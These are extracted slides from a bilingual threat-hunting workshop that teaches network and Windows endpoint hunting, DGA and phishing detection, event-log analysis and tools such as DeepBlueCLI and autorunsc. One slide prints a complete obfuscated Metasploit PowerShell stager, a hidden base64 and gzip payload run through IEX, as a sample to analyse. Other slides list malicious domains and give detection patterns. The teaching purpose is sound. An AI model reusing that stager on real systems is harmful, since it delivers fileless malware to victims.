ENDPOINT & NETWORK

THREAT HUNTING

United Tractor
13 February 2020
Yohanessyailendra at gmail dot com
#WHOAMI
Yohanes Syailendra, M.Kom, CREST (CPSA), CEI, ECSA, CEH
• Cyber Security Geek, Especially on Malwares
• Cyber Incident Response & Threat Hunting
• Threat Intelligence Researcher
• Perform Penetration Testing for 1000+ Routers/Servers, 30+ Web/Mobile
Applications, 1000+ Application / Malware analysis & Reverse Engineering
• Perform ISO 27001 Assessment across 32+ Data Centers
• Trainer for BSSN, Kemhan, PwC, Indosat, Telkomsel
• Research team on Indonesia Honeynet Project, Malware Stream
• 2013 & 2014 & 2015 Cyber Defence Kemhan Winner
 DOWNLOAD MATERIAL PRESENTATION
(WORKSHOP)

https://s.id/threathuntingunitedtractor
WORKSHOP OBJECTIVE
• Workshop ini akan Fokus dan mendalami Threat Hunting Activity dari sudut Pandang Network &
Endpoint Threat Hunting
• Peserta akan menerima materi Endpoint & Network Threat Hunting dengan beberapa metode :
• Threat Hunting from Network Perspective
• Threat Hunting from Event Logs

• Agenda :
• Introduction to Threat Hunting
• Network Threat Hunting
• Endpoint Threat Hunting

4
INTRODUCTION TO THREAT HUNTING
CYBER ATTACK PROCESS Common Attacks :
•
•
DDOS Attack
Ransomware Attacks

Malware will send the target data

Common Attacks :
• Web App Attacks Organization Premises
(SQL/XSS/Command
Injection)
• Brute Force Attacks
• Exploits SMB/http

Web Server Mail Server File Server TARGET SERVER

Attackers

How? Just Create

a malware

Employees
ABOUT THE ADVERSARIES

7
ABOUT THE ATTACK

8
MOVING FROM PURE PREVENTION TO BREACH RESILIENCE

9
DETECT -> PREVENT -> ANALYZE -> RESPOND

10
MONITORING VS INCIDENT RESPONSE

Security Threat Incident

Monitoring Hunting Response

Search queries, hi-fi rules,TI

Event investigation, IOC extraction,
retro-search

11
THREAT HUNTING VS COMPROMISED ASSESSMENT

What is the Main Differences Between Threat Hunting and Compromise Assessment?
Basically Threat Hunting and Compromise Assessment is a same activity, but the
main difference are :
✓Situation & Condition : Threat Hunting -> Assuming Compromise will
happen ; and CA -> Compromise is Already happened
✓Location & Object : TH -> All Object Within Organization ; CA -> Selected
Network Segment / Zone Suspected for Compromise area
✓Actor (Who performed the activities?) : TH -> Empowered SOC Team (part
of SOC Team) ; CA -> Mostly from DFIR Team

12
ALERT BASED INVESTIGATION VS THREAT HUNTING

13
THREAT HUNTING ACTIVITY

14
CYBER KILL CHAIN VS MITRE ATT&CK

15
THREAT HUNTING PROCEDURES Prosedur dalam Threat Hunting:
1. Membuat Hipotesa
2. Investigasi terhadap Log
3. Identifikasi Pola serangan dan TTP
4. Melakukan Korelasi dan pengayaan informasi

Untuk membuat hipotesis yang lebih baik, focus kepada

Salah satu bagian dalam Cyber Kill Chain yang ingin di
buru
THREAT HUNTING METHODOLOGY
DISCOVERY AND COLLECTION METHODS
• Real-Time Monitoring
– Log endpoint activity to a central server (i.e. Sysmon+ELK ; HIDS ; EDR ; Event Log ; Osquery)
– Network Collection (Packet, Log, Flow) :
➢ Packet Capture
➢ Network Flow
➢ Log from Network Device / Network Security Device : IDS / IPS, FW, Proxy, DNS, WAF, NGFW, UTM, etc

• On-Demand Collection (one-time or periodic)

– Collect artifacts and information related to system state (Forensic Triage)
➢ i.e. process lists, autoruns, shimcache entries, forensic artifacts, etc.

• Query - Ask specific questions or look for a specific IOC

– Real-time: Reach down to the endpoint directly (i.e. OSQuery, GRR, Velociraptor, MozDef)
– Non Real-Time: Search pre-collected logs or data (i.e. EDR)

18
HUNT METHODOLOGIES
Search for indicators missed via historical search of logs and/or alert data
Historical Search
Query (IoC) Event Match
(Source: Alerts)

Search for patterns of behavior based on known attacker tactics (TTPs)

Query (TTP) Pattern Match

Behavior Analysis
(Source: Logs) Find anomalies relative to baselined profiles and user behavior

Baseline Deviation from Normal

Deep host inspection to identify what is on each system

State Analysis
(Source: Forensics) Forensic Triage Artifacts and/or Malware

19
ANALYSIS: FORENSIC STATE ANALYSIS
Utilizing data stacking and hunt analysis methods:

1. Review all running processes and loaded modules  Current look

2. Review all autorun entries and locations  Future look
3. Review all execution & forensic artifacts  Historical look
4. Identify any evidence of host manipulation or indications of generic compromise
5. Review recent privileged account usage

20
ANALYSIS TECHNIQUE (FORENSIC STATE ANALYSIS)
Threat Hunting technique that applies phased levels of analysis to collected data to reduce the data set to a
manageable level:

1. Enrichment - Reputation & threat intel lookups

2. Triage – Algorithms & methods to categorize interesting things
a. Data Stacking

b. Anomaly/Outlier Identification

3. Advanced Analysis
a. Static/Dynamic Analysis of Interesting Samples

b. TTP Pattern Matching (dig into logs)

21
 Why Can’t My Prevention
&
Real Time Monitoring Tools Do This
 THREAT HUNTING VS PROTECTION
Why most protection tools make poor hunt tools:
• Prevention and real-time detection solutions (AV/IDS) strive for low False
Positive (FP) alerting
• Hunt solutions widen the aperture and seek low False Negatives (FN)

– For Hunters: anomalies, outliers, and suspicious activity are leads, not FPs to
be tuned out
– A good hunt solution sorts and scores leads; enables a quick path to verify
and investigate to a conclusion

23
NETWORK THREAT HUNTING
 9

WHY HUNT ON THE NETWORK

• Known bad network IOCs are short-lived

• IPs change - SAAS has made it easier to migrate to new infrastructure
• Domains change - Domain registration has gotten simpler (little or no
validation), cheaper (tons of new TLDs) and stealthy (WHOIS privacy
service)
• Instead, find unknown bad from higher order signals and
patterns
NETWORK THREAT HUNTING • Pelajari semua kondisi normal dari Jaringan Anda.
Setiap Jaringan adalah UNIK.
• Temukan anomali dalam kondisi jaringan. Contoh
beberapa kondisi yang dapat dilihat:
• Trafik Outbound yang anomaly (server yang
mengirim traffic tertentu ke internet)
• Anomali pada Akun user yang terautentikasi
• Anomali pada akses berdasar Geografis
• Anomali pada User login => akses berkali-kali
pada akun
• Anomali pada read (select) pada database
(saat data exfiltration)
• Anomali pada HTML Response (besar)
• Akses terhadap service yang sangat banyak
secara bersamaan
• Port Aplikasi yang dipakai tidak seharusnya
(missal. DNS traffic lewat port 80)
• Anomali terhadap perubahan registry atau file
system
• Anomali terhadap DNS Requests
 15

FAST FLUX (BENIGN)

Domain # IPs Owner of IP space
microsoft informatica ltda, microsoft corp,
prod-w.nexus.live.com.akadns.net. 21 microsoft corporation
www-google-analytics.l.google.com. 26 google inc
amazon.com inc, amazon technologies inc,
sync.teads.tv. 21 amazon data services ireland limited
amazon data services ireland ltd, amazon web
services, elastic compute cloud ec2 eu,
prodlb01-1956114858.eu-west- amazon.com inc, amazon technologies inc, dub5
1.elb.amazonaws.com. 19 ec2
ap.gslb.spotify.com. 25 spotify ltd, spotify ab
profile.ess-apple.com.akadns.net. 23 apple inc
 16

FAST FLUX (MALICIOUS)

Domain # IPs CC distribution Owner of IP space
dynamic ip pool, earthlink ltd.
ahmdallame.no-ip.biz 34 iq,fr Communications & internet services
edis infrastructure in france, mexico server,
telentia enterprise customer, amplusnet srl,
micfo llc., serverastra kft, india server,
dynamic ip pool, adsl_maroc_telecom, psinet
liiion999.zapto.org 45 fr, ma, it, us, hu, at, ro, mx inc, national computer systems co
dynamic ip pool, mexico server,
maroctelecomasdl, edis infrastructure in
spain, telentia enterprise customer, amplusnet
srl, serverastra kft., india server, leaseweb
netherlands b.v., adsl_maroc_telecom,psinet
liiion777.zapto.org 50 fr, ma, us, hu, at, nl, ro, mx inc.

False positive *.pool.ntp.org also hosted on diverse IP address space

DOMAIN GENERATION ALGORITHM (DGA)

“Algorithmically generate large number of domain names, to serve as C&C

servers”

• Thousands of potential domains per day

• Botnet controller only needs to register one of them to keep the
lights on
 18

DGA - FEATURES
• Features
• Entropy
• Length
• Vowel to Consonant ratio
• Longest consonant sequence
• ngrams from Alexa top domains 2LDs
• ngrams from English dictionary
• RandomForestClassifier
 19

DGA (TRUE POSITIVES)

Cryptolocker (96.4% accuracy) Verdict Confidence
vobrbjlloae.fr DGA 0.92
sgnuqrek.uk DGA 0.84
dkoudkavtnjc.tf DGA 0.97
kspruxe.uk DGA 0.62
qalhanhhsockuxj.yt DGA 0.96
wtjawjv.nl DGA 0.64

Tiny Banker (98.2% accuracy) Verdict Confidence

sdprjrntgvlw.ru DGA 0.98
fnetiyouqksr.xyz DGA 0.96
cpowrnbskkxt.xyz DGA 0.99
pmiioppkqrvw.pw DGA 0.98
brstpvrtkcpp.com DGA 0.97
htschinwcghk.com DGA 0.86
 32

DGA (FALSE NEGATIVE)

Domain Verdict Confidence
perhapstogether.net DGA 0.52
partydifference.net DGA 0.58
summerdifference.net DGA 0.53
womandifference.net DGA 0.53
gentlemanalthough.net DGA 0.52
experienceevery.net Benign 0.52
beginevery.net Benign 0.76
partyperiod.net Benign 0.69
smokesingle.net Benign 0.69
mountainmatter.net Benign 0.53
mountainapple.net Benign 0.73
 33

NXDOMAIN
• Thousands of the DGA domains queries but only few resolve
• Normally typos, copy paste errors, browser prefetch. Less than 5% of the
traffic
Malware Family NXDOMAIN ratio
Cryptolocker 2.07
Nivdort 13.58
Telsacrypt 14.38
 34

FALSE POSITIVE
Domain Class Probability
qetdjnndqo.c*****1.org. DGA 0.83
mjhhofjsdrsulcn.c*****1.org DGA 0.96
hicbaxevoldlszl.c*****1.org DGA 0.96
bchbnajexhspfrq.c*****1.org DGA 0.97
mbgmajnvrvyn.c*****1.org DGA 0.96
nlbvxhfomxx.c*****1.org DGA 0.95
• DGA like domains
• Most of them NXDOMAINs
• WHOIS privacy proxy

Chrome DNS wildcard detection!

 35

Phishing Detection
PHISHING DETECTION
Real website Fake site
facebook.com facebookc.om
malware.com rnalware.com
apple.com applesoftupdate.com
paypal.com paypal.com.user.accounts.lwproductions.net

• “Edit distance : number of operations like removal, insertion or substitution of

characters that converts one string to the other”
• Longest common substring: use a suffix tree
 29

NEXT STEPS?

• Validate outliers
• New or consistent behavior?
• How many hosts?
• How many models triggered
• Identify the user(s)/process generating the traffic, assess maliciousness
• If malicious, kick off DFIR process
 30

ONE MORE THING

• Every network is different, find out what’s normal for yours
• Maintain a list of newly observed domains in your network
• Segment your network by the source of outliers
WHAT SHOULD BE LOOKED INTO NETWORK
Buatlah Hipotesa bahwa seluruh
aktifitas network dalam keadaan
encrypted atau obfuscated
• Reconnaissance
• Penyerang melakukan identifikasi network dan enumerasi service

• Weaponization
• Endpoint melakukan download terhadap modul yang berbahaya (Malicious)

• Delivery
• Endpoint melakukan download malware / click URLs

• Exploitation
• Attacker melakukan penyerangan terhadap endpoint (Exploit)
WHAT SHOULD BE LOOKED INTO NETWORK (CONTD.)
• Lateral Movement Activities
• Malware / Penyerang melakukan infeksi ke endpoint lainnya dalam jaringan

• CnC Communication
• Malware melakukan kontak dengan C2 Server (domain asing / IP address
asing / Protokol asing)

• Data Exfiltration
• Malware / Penyerang melakukan pengiriman data ke luar jaringan
(domain asing / IP address asing / protocol asing)
LOOK INTO ATT&CK FOCUS ON NETWORK
PREREQUISITE TO DO NETWORK THREAT HUNTING
• Detailed Network RAW Access (PCAP)
• Netflow
• Network Logs (Dari IDS / Firewalls / IPS)
• Data Korelasi menggunakan SIEM
• Data Threat Intelligence (Malicious Domains, Malicious IP address, Bad Hash value)
• Easiest Way => Threat Hunting Platform
LAB PREPARATION – WIRESHARK
• Konfigurasi Wireshark agar dapat melakukan Analisa dengan lebih mudah
NETWORK THREAT HUNTING LAB
(ATTACK PROCESS HUNTING)
Goal : Mencari pola serangan yang sedang terjadi dalam jaringan

Normal nya, enumerasi dan serangan exploitasi telah dapat diidentifikasi oleh perangkat keamanan (IDS
atau Firewall). Namun attacker atau Malware melakukan Lateral Movement menggunakan metode yang
sama dan tidak terdeteksi oleh Firewall (gateway)
• Identifikasi pola serangan Enumerasi (Nmap)
• Identifikasi pola serangan Exploit dan Payload (Metasploit)
TIME TO HUNT!
• Install Wireshark
• Download PCAP:
• Identifikasi :
• Host yang ter infeksi malware
• Domain atau IP address C2 Server
• Bagaimana melakukan lateral Movement (bila ada)
• Aktifitas apa saja yang dilakukan di dalam jaringan (TTP) (bila ada)
• Bagaimana Malware dapat menyerang masuk (infiltrate) (bila ada)

•
ENDPOINT THREAT HUNTING
WHY THREAT HUNTING ON ENDPOINT?

46
! WHY THREAT HUNTING ON ENDPOINT?
• So what do we do?
• Agents need to be deployed FAST!!!
• Start Monitor:
• Process Creation/Termination
• Registry Access
• Process Execution
• Autoruns
• Etc

47
EVENT VIEWER - WINDOWS
• What?
➢ Event Viewer, a component of Microsoft’s Windows NT line of operating
systems, lets administrators and users view the event logs on a local or
remote machine.
• Where?
➢ Control Panel --> Administrative Tools --> Event Viewer

48
EVENT VIEWER - WINDOWS
• Convenient and pretty
• Works only on live
systems
• Does not work on a
forensics image
• We have to parse the
event logs

49
50
EVENT LOGS
• Binary Structure
• Header and a series of records
• Event ID formats
• http://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=528

• Application logs are vendor specific

• EventID.net is a good source for this info - $$$
• blogs.msdn.com/ericfiz/default.aspx
• www.microsoft.com/technet/support/ee/ee_advanced.aspx

51
EVENT LOG AND THREAT
• Malware and exploit frameworks have been evolving faster than common
preventive technologies have kept up
o Detective controls allow more aggressive checks
• By default Metasploit creates random service names like this:
o Service Name: GWRhKCtKcmQarQUS
o Service name matches: ^[A-Za-z]{16}$

• Blocking 16 character service names containing only upper and lower

alpha characters could lead to false positives
• This is how you fight, and this is how you win:
o Automatically detect these names, married with rapid incident response

52
THE EVOLUTION OF MALWARE AND PAYLOAD
• Often in c:\windows\system32\RanDOmNAme.exe
• Metasploit exploit target: Native upload
• Corporate malware defenses are designed to prevent this
• Newer Malware and exploitation frameworks are migrating to 'fileless malware',
leveraging PowerShell for post exploitation
• They avoid using .ps1 files, and load the code via (very long) command
lines, or use the PowerShell WebClient.DownloadString Method
• Metasploit exploit target Powershell uses a long compressed and base64-
encoded PowerShell function loaded via cmd.exe

53
UH… OH…
• C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq
4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object
System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object
IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM
2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7m
PqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFi
mzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGj
xjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8Hp
D3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCP
P+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAy
CS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuu
r/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8Zy
NlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyW
zmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqV
KPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6
TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgf
jAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3T
bf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSd
SogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1
F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX
• (New-Object IO.StreamReader(New-Object
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecut
e=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnost
ics.Process]::Start($s);

54
DETAILS

• Command is > 2400 bytes

• powershell.exe launched via cmd.exe
• Hidden PowerShell window
• gzip compressed and Base64 encoded PowerShell function
o To analyze: decode base64, and then decompress with gzip
o Result: obfuscated PowerShell function

55
ADVANTAGE THE TECHNIQUE FOR ATTACKER
• Antivirus will allow cmd.exe and powershell.exe to execute
• There are no files saved to the disk to scan
• If the system is using application whitelisting: cmd.exe and
• powershell.exe will be whitelisted
• Restricting execution of ps1 files via Set-ExecutionPolicy settings has no
effect
• o "Set-ExecutionPolicy is not a Security Control" - @Ben0xA, DerbyCon 2016
• There is no logging of process command lines or PowerShell commands by
default
• Preventive and detective controls tend to allow and ignore these methods
56
COMMAND LINE TO LOOK FOR (HUNTING HYPOTHESIS)
• Loooooooooong commands (1,000+ bytes)
• csc.exe (C# compiler)
• cvtres.exe (Resource File To COFF Object Conversion Utility)
• rundll32.exe and cscript.exe
• .vbs scripts
• schtasks and at
• Anything launched from a temp folder
• Launching PowerShell via cmd.exe
• Base64 encoded commands
57
POWERSHELL LOGGING
• PowerShell 2 (Windows 7) has very little logging
capability
• PowerShell 5+ includes multiple methods for
logging PowerShell activity (not enabled by
default)
• Event 4103 (Module Logging) is very helpful
• PowerShell 2 can be upgraded to PowerShell 5.1 (released with the
Windows 10 Anniversary Update) in one step
• Upgrade all Windows systems to PowerShell 5+
58
MICROSOFT SYSMON
• Could ease introduction into some environments
• Integrates cleanly into most SIEM or Windows Event Collection environments by logging to
Windows Event Log:
• Applications and Services Logs/
Microsoft/Windows/Sysmon/Operational
• Sysmon can automatically generate hashes of all (or selected) binaries that run on
a system

• Allows submission to services such as VirusTotal

• Or a belt-and-suspenders detective whitelisting process…

59
SYSMON CAPABILITIES

60
INTRODUCING DEEPBLUECLI FOR THREAT HUNTER
• DeepBlueCLI (PowerShell version) runs on PowerShell 3.0 or higher
o Can process PowerShell 4.0/5.0 event logs
o DeepWhite requires PowerShell 4+
• Processes local event logs, or evtx files
o Either feed it evtx files, or parse the live logs via Windows Event Log collection
• DeepBlueCLIv2 outputs in PowerShell objects
o May be piped to Format-List, Format-Table, Out-GridView, ConvertTo-Csv,
ConvertTo-HTML, ConvertTo-json, ConvertTo-Xml, etc.
• Thanks for the help: Joshua Wright (@joswr1ght), John Strand
(@strandjs), and Mick Douglas (@bettersafetynet).
61
DEPPBLUECLI SAMPLE:
• DeepBlueCLI detects a large number of suspicious behaviors

62
DEEPBLUECLI OUTPUT

63
LAB ENDPOINT THREAT HUNTING – DEEPBLUECLI FOR THREAT HUNTING
• Use DeepBlueCLI to Check on your Windows Log
• Open your Powershell CLI from your Windows.
• Try this several command :
• PS C:\Users\User\> .\DeepBlue.ps1 -log security
• PS C:\Users\User\> .\DeepBlue.ps1 -log application
• PS C:\Users\User\> .\DeepBlue.ps1 -log system

• Use DeepBlueCLI to check from Sample EVTX :

• PS C:\Users\User\> .\DeepBlue.ps1 .\evtx\new-user-security.evtx
• PS C:\Users\User\> .\DeepBlue.ps1 .\evtxdisablestop-eventlog.evtx
• PS C:\Users\User\> .\DeepBlue.ps1 .\evtx\many-events-security.evtx
• PS C:\Users\User\> .\DeepBlue.ps1 .\evtx\many-events-application.evtx

64
DEEPBLUECLI FOR THREAT HUNTING LAB
• Use DeepBlueCLI to check from Sample EVTX :
• PS C:\Users\User\> .\DeepBlue.ps1 .\evtx\metasploit-psexec-native-target-security
• PS C:\Users\User\> .\DeepBlue.ps1 .\evtx\smb-password-guessing-security.evtx
• PS C:\Users\User\> .\DeepBlue.ps1 .\evtx\psattack-security.evtx
• PS C:\Users\User\> .\DeepBlue.ps1 .\evtx\mimikatz-privesc-hashdump.evtx

65
WINDOWS AUTORUNSC.EXE DETECTION MALWARE PERSISTENCE

66
AUTORUNSC.EXE TOOLS STEP BY STEP
1. Get an image of disk / computer you want to analyze : (Use FTK Imager, dd, etc)
2. Mount Read Only the disk image evidence from Step 1
3. Perform autorunsc.exe analysis to all folder mounted from disk image evidence
4. Analysis of CSV files generated by autorunsc.exe in Step 3.

67
WINDOWS AUTORUNSC.EXE DETECTION OF MALWARE PERSISTENCE

68
ANALYSIS OUTPUT FROM AUTORUNSC.EXE FOR MALICIOUS ACTIONS

69
ANALYSIS OUTPUT FROM AUTORUNSC.EXE TO IDENTIFY MALICIOUS
ACTIVITY FROM SYSTEM

70
ANALYSIS OUTPUT FROM AUTORUNSC.EXE TO IDENTIFY MALICIOUS
ACTIVITY FROM SYSTEM

71
ANALYSIS OUTPUT FROM AUTORUNSC.EXE TO IDENTIFY MALICIOUS
ACTIVITY FROM SYSTEM

72
ANALYSIS OUTPUT FROM AUTORUNSC.EXE TO IDENTIFY MALICIOUS
ACTIVITY FROM SYSTEM

73
ANALYSIS OUTPUT FROM AUTORUNSC.EXE TO IDENTIFY MALICIOUS
ACTIVITY FROM SYSTEM

74
ANALYSIS OUTPUT FROM AUTORUNSC.EXE TO IDENTIFY MALICIOUS
ACTIVITY FROM SYSTEM

75
ANALYSIS OUTPUT FROM AUTORUNSC.EXE TO IDENTIFY MALICIOUS
ACTIVITY FROM SYSTEM

76
ANALYSIS OUTPUT FROM AUTORUNSC.EXE TO IDENTIFY MALICIOUS
ACTIVITY FROM SYSTEM

77
 “Know Your Enemy, Know Yourself, And Victory is Never in

“THANK YOU” Doubt, not in a hundred battles “

- Sun Tzu -